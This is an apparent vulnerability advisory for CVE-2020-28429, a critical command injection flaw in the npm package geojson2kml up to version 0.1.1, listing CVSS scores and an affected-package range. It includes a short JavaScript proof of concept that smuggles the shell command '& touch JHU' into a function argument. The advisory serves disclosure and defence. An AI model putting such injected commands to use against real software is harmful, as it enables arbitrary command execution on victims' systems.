CVE-2020-28429
CRITICAL9.8EPSS 84.8%Command Injection in geojson2kml
Published: 5/10/2021Modified: 11/8/2023
Description
All versions up to and including version 0.1.1 of package geojson2kml are vulnerable to Command Injection via the index.js file. ### PoC: ```js var a =require("geojson2kml"); a("./","& touch JHU",function(){}) ```
Affected packages (1)
- npm/geojson2kmlfrom 0, <= 0.1.1
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL9.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |